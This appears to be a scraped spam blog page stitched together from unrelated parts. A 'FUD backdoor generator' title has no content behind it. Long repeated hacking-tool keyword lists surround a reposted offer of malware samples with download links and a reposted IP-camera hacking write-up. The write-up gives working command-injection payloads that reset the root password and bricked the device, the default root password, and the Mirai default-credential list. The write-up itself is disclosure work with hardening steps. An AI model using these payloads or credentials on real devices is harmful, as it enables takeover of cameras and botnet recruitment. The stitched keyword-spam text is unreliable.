Monday, August 31, 2020

HaCode - FUD Backdoor Generator / Remote Administration Tool

Related word


  1. Hacking Tools For Games
  2. Hacking Tools For Windows 7
  3. Hack Tools Download
  4. Easy Hack Tools
  5. Hacker Tools Free Download
  6. Hacker Tools Hardware
  7. New Hack Tools
  8. How To Hack
  9. Wifi Hacker Tools For Windows
  10. Hacking Tools Windows 10
  11. Pentest Tools Website Vulnerability
  12. Usb Pentest Tools
  13. Tools 4 Hack
  14. Tools 4 Hack
  15. Growth Hacker Tools
  16. Pentest Tools Windows
  17. Hacker Tools For Windows
  18. Pentest Tools Url Fuzzer
  19. Blackhat Hacker Tools
  20. Pentest Tools Review
  21. Best Pentesting Tools 2018
  22. Hacker Hardware Tools
  23. Pentest Tools For Android
  24. Hack Tools Github
  25. Free Pentest Tools For Windows
  26. Pentest Recon Tools
  27. Pentest Tools Tcp Port Scanner
  28. Wifi Hacker Tools For Windows
  29. Hacking Tools For Windows
  30. Nsa Hack Tools Download
  31. Hacker Tools 2019
  32. Hacking Tools For Mac
  33. Hacker Tools Free Download
  34. Pentest Tools Website
  35. Top Pentest Tools
  36. Hacking Tools And Software
  37. Hacker Tools Apk Download
  38. Hack Tools For Games
  39. Hack Tools For Pc
  40. Termux Hacking Tools 2019
  41. Best Pentesting Tools 2018
  42. Hack Tools For Games
  43. Nsa Hacker Tools
  44. Hacking Tools
  45. Pentest Tools For Mac
  46. Ethical Hacker Tools
  47. Black Hat Hacker Tools
  48. Pentest Tools Alternative
  49. Hacking Tools For Games
  50. Hacking Tools For Games
  51. Hacker Tools Software
  52. Top Pentest Tools
  53. Hacking Tools 2019
  54. Hack Tools For Ubuntu
  55. Pentest Tools Review
  56. Hacker Tools Apk
  57. Hack Tools 2019
  58. Hacking Tools Windows 10
  59. Pentest Tools Android
  60. Pentest Tools Find Subdomains
  61. Hacking Tools Online
  62. Hacker Search Tools
  63. Hack Tools For Ubuntu
  64. Pentest Tools Kali Linux
  65. Pentest Tools Subdomain
  66. Hacker Tools 2020
  67. Pentest Tools Windows
  68. How To Make Hacking Tools
  69. Hacker Tools Apk Download
  70. Pentest Tools For Mac
  71. Hacking Tools For Games
  72. Hack Tools For Mac
  73. Pentest Tools Online
  74. Best Hacking Tools 2019
  75. Hacks And Tools
  76. Hacker Tools Apk
  77. Hacker
  78. Hacking Tools Kit
  79. Hacker Tools
  80. Hacker Tools Windows
  81. Hacker Tools Free
  82. Easy Hack Tools
  83. Hacker Tools Software
  84. Pentest Reporting Tools
  85. Hacker Tools Software
  86. Hacking Tools For Mac
  87. Hack Tools
  88. Android Hack Tools Github
  89. Pentest Tools For Windows
  90. Pentest Box Tools Download
  91. New Hacker Tools
  92. Install Pentest Tools Ubuntu
  93. Hacker Tools Linux
  94. Hacking Tools Download
  95. Pentest Tools Windows
  96. Hack Tools
  97. Hacker Tools For Pc
  98. Hacker
  99. How To Install Pentest Tools In Ubuntu
  100. Hacker Tools Mac
  101. Hacking Tools Hardware
  102. Hacking Tools For Windows
  103. Hack Tools For Games
  104. Hacker Hardware Tools
  105. Hacking Apps
  106. Pentest Reporting Tools
  107. Pentest Tools Free
  108. Hacking Tools Hardware
  109. Hacker Tools List
  110. Pentest Tools Port Scanner
  111. Wifi Hacker Tools For Windows
  112. Hacker Hardware Tools
  113. Hack Tools
  114. Pentest Recon Tools
  115. Hacker Tools For Mac
  116. Hacking Tools Usb
  117. Pentest Tools For Windows
  118. Hack Tools
  119. Pentest Box Tools Download
  120. Hack Tools For Windows
  121. Usb Pentest Tools
  122. Pentest Tools Online
  123. Pentest Tools Alternative
  124. Hacking Tools For Mac
  125. What Are Hacking Tools
  126. Nsa Hack Tools Download
  127. Black Hat Hacker Tools
  128. Underground Hacker Sites
  129. Hack Tools Pc
  130. Hacking Tools Usb
  131. Hacker Tools List
  132. Pentest Tools Subdomain
  133. Pentest Tools Online
  134. Pentest Tools Apk
  135. Pentest Tools Free
  136. Pentest Tools Subdomain
  137. Hacking Tools Free Download
  138. Hacker Tools Online
  139. Hack Tool Apk No Root
  140. Hacking Tools For Beginners
  141. Tools 4 Hack
  142. Hack Apps
  143. Hack Tools Mac

Sunday, August 30, 2020

Ask And You Shall Receive



I get emails from readers asking for specific malware samples and thought I would make a mini post about it.

Yes, I often obtain samples from various sources for my own research.

 I am sometimes too lazy/busy to post them but don't mind sharing.
If you are looking for a particular sample, feel free to ask. I might have it.

Send MD5 (several or few samples). I cannot provide hundreds/thousands of samples or any kind of feeds. If you ask for a particular family, I might be able to help if I already have it.

Unfortunately, I do not have time to do homework for students and provide very specific sets for malware with specific features as well as guarantee the C2s are still active.  Send your MD5(s) or at least malware family and I check if I have it :) If i have it, I will either send you or will post on the blog where you can download.

If you emailed me in the past and never got an answer, please remind me. Sometimes emails are long with many questions and I flag them to reply to later, when I have time and they get buried or I forget. It does not happen very often but accept my apologies if it happened to you.

Before you ask, check if it is already available via Contagio or Contagio Mobile.
1. Search the blog using the search box on the right side
2. Search here https://www.mediafire.com/folder/b8xxm22zrrqm4/BADINFECT
3. Search here https://www.mediafire.com/folder/c2az029ch6cke/TRAFFIC_PATTERNS_COLLECTION
4. Search here https://www.mediafire.com/folder/78npy8h7h0g9y/MOBILEMALWARE

Cheers,  Mila

Related news

How I Hacked My IP Camera, And Found This Backdoor Account

The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.

Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.

The obvious problems



I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.

It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in 
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

Let's run a quick nmap on this device.
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     BusyBox telnetd
81/tcp   open  http       GoAhead-Webs httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized
|_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open  tcpwrapped
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

The double-blind command injection

The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)
or cleaning up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`)           ;leak it via DNS
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.



But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)
Now, logging in via telnet
(none) login: root
Password:

BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#

Woot woot :) I quickly noticed the root of the command injection problem:

# cat /tmp/ftpupdate.sh
/system/system/bin/ftp -n<<!
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
binary
mkdir  PSD-111111-REDACT
cd PSD-111111-REDACT
lcd /tmp
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
close
bye

Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. 

root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.



It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.

Last but not least everything is running as root, which is not surprising. 

My hardening list

I added these lines to the end of /system/init/ipcam.sh:
sleep 15
echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.

My TODO list

  • Investigate the script /system/system/bin/gmail_thread
  • Investigate the cloud protocol * - see update 2016 10 27
  • Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. 

And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.


When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.

If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 

Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html

Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.

root     xc3511
root     vizxv
root     admin
admin    admin
root     888888
root     xmhdipc
root     default
root     juantech
root     123456
root     54321
support  support
root     (none)
admin    password
root     root
root     12345
user     user
admin    (none)
root     pass
admin    admin1234
root     1111
admin    smcadmin
admin    1111
root     666666
root     password
root     1234
root     klv123
Administrator admin
service  service
supervisor supervisor
guest    guest
guest    12345
guest    12345
admin1   password
administrator 1234
666666   666666
888888   888888
ubnt     ubnt
root     klv1234
root     Zte521
root     hi3518
root     jvbzd
root     anko
root     zlxx.
root     7ujMko0vizxv
root     7ujMko0admin
root     system
root     ikwb
root     dreambox
root     user
root     realtek
root     00000000
admin    1111111
admin    1234
admin    12345
admin    54321
admin    123456
admin    7ujMko0admin
admin    1234
admin    pass
admin    meinsm
tech     tech
mother   fucker

Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk

Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/


Related posts
  1. Hackrf Tools
  2. Tools 4 Hack
  3. Hacker Tools For Ios
  4. Install Pentest Tools Ubuntu
  5. Pentest Tools Online
  6. Hacking Tools Online
  7. Hack Tools Online
  8. Hackers Toolbox
  9. Pentest Tools Kali Linux
  10. Pentest Automation Tools
  11. Hacking Tools For Mac
  12. Hacker Tools Mac
  13. Hacking Tools For Mac
  14. Beginner Hacker Tools
  15. Hacker Tools Hardware
  16. Hacker Tools 2020
  17. Hacker Tools Free
  18. How To Install Pentest Tools In Ubuntu
  19. Hacking Tools Online
  20. Hacker Tools Mac
  21. Pentest Tools Linux
  22. Hacking Tools Pc
  23. Hacking Tools Kit
  24. Tools For Hacker
  25. Best Hacking Tools 2020
  26. Hacker Techniques Tools And Incident Handling
  27. Hack Tool Apk
  28. How To Make Hacking Tools
  29. Pentest Tools Alternative
  30. Hacker Tools 2019
  31. Tools 4 Hack
  32. Growth Hacker Tools
  33. Pentest Tools Nmap
  34. Hacking Tools For Windows Free Download
  35. Hack Tools Mac
  36. Hack Tool Apk
  37. Hacker Tools Apk Download
  38. Pentest Tools Download
  39. Pentest Tools Framework
  40. Hack Tool Apk No Root
  41. Pentest Tools Website Vulnerability
  42. Install Pentest Tools Ubuntu
  43. Easy Hack Tools
  44. Hack Rom Tools
  45. Pentest Tools Tcp Port Scanner
  46. How To Hack
  47. Tools Used For Hacking
  48. How To Hack
  49. Hacker Tools Hardware
  50. Pentest Tools Website Vulnerability
  51. Hacking Tools And Software
  52. Pentest Tools Url Fuzzer
  53. Hacker Tools For Windows
  54. Pentest Tools
  55. Hacker Tools Linux
  56. Hacker Tools 2020
  57. Hacking Tools Windows 10
  58. Hack Tools For Windows
  59. World No 1 Hacker Software
  60. Pentest Tools Kali Linux
  61. Pentest Tools Review
  62. Pentest Tools Free
  63. Hackrf Tools
  64. Github Hacking Tools
  65. Hacking Tools Usb
  66. Tools 4 Hack
  67. Pentest Box Tools Download
  68. Pentest Tools Url Fuzzer
  69. Hack Tools Mac
  70. Pentest Tools Online
  71. Hack Tools For Mac
  72. Hacker Tools For Pc
  73. Hackrf Tools
  74. Pentest Tools Website Vulnerability
  75. Pentest Tools
  76. Nsa Hack Tools
  77. Hacking Tools 2020
  78. Tools For Hacker
  79. Hack Rom Tools
  80. Pentest Tools Github
  81. Best Pentesting Tools 2018
  82. Hacking Tools Hardware
  83. Hacking Tools Windows
  84. Beginner Hacker Tools
  85. Underground Hacker Sites
  86. Hacker Tools Software
  87. Hack Tools 2019
  88. Nsa Hacker Tools
  89. Pentest Tools Alternative
  90. Hack Tools Online
  91. How To Install Pentest Tools In Ubuntu
  92. Pentest Tools For Ubuntu
  93. Best Hacking Tools 2020
  94. New Hacker Tools
  95. Hack Tool Apk No Root
  96. Pentest Tools Nmap
  97. Pentest Tools Apk
  98. Hacker Tools Online
  99. Hacking Tools Windows 10
  100. Hacker Tools Free
  101. Pentest Tools Tcp Port Scanner
  102. What Are Hacking Tools
  103. Hacker Tools Apk
  104. Pentest Tools For Android
  105. Hack Tools For Games
  106. Pentest Tools Open Source
  107. Pentest Automation Tools
  108. Hacking Tools 2019
  109. Pentest Tools Website Vulnerability
  110. Hack Tools For Windows
  111. Pentest Tools For Android
  112. Pentest Tools Nmap
  113. Hack Tools For Pc
  114. Pentest Tools For Windows
  115. Hacking Tools Free Download
  116. Hack Tools For Pc
  117. Hack Tools
  118. Hacking Tools Windows 10
  119. Hacking Tools Free Download
  120. Hacker Hardware Tools
  121. Hacker Tools Mac
  122. Hack Rom Tools
  123. Free Pentest Tools For Windows
  124. Pentest Tools For Android
  125. Computer Hacker
  126. Pentest Tools Kali Linux
  127. New Hacker Tools
  128. Hack Tools Pc
  129. Hacker
  130. Underground Hacker Sites
  131. Hack Tool Apk
  132. Hack Tool Apk No Root
  133. Wifi Hacker Tools For Windows
  134. Pentest Tools Framework
  135. Pentest Tools For Mac
  136. Pentest Tools Download
  137. How To Make Hacking Tools
  138. Free Pentest Tools For Windows
  139. What Is Hacking Tools
  140. Growth Hacker Tools
  141. Hacking Tools Github
  142. Hacking Tools Mac
  143. Hacker Tools For Mac
  144. Hack Website Online Tool
  145. Tools 4 Hack
  146. Pentest Tools Framework
  147. Hack Website Online Tool
  148. New Hack Tools
  149. Pentest Tools For Windows
  150. Blackhat Hacker Tools
  151. Pentest Tools Alternative
  152. Hacker Techniques Tools And Incident Handling
  153. Hacking Apps
  154. World No 1 Hacker Software
  155. Hacking Tools Github
  156. Hacker Tools For Windows
  157. Pentest Tools Online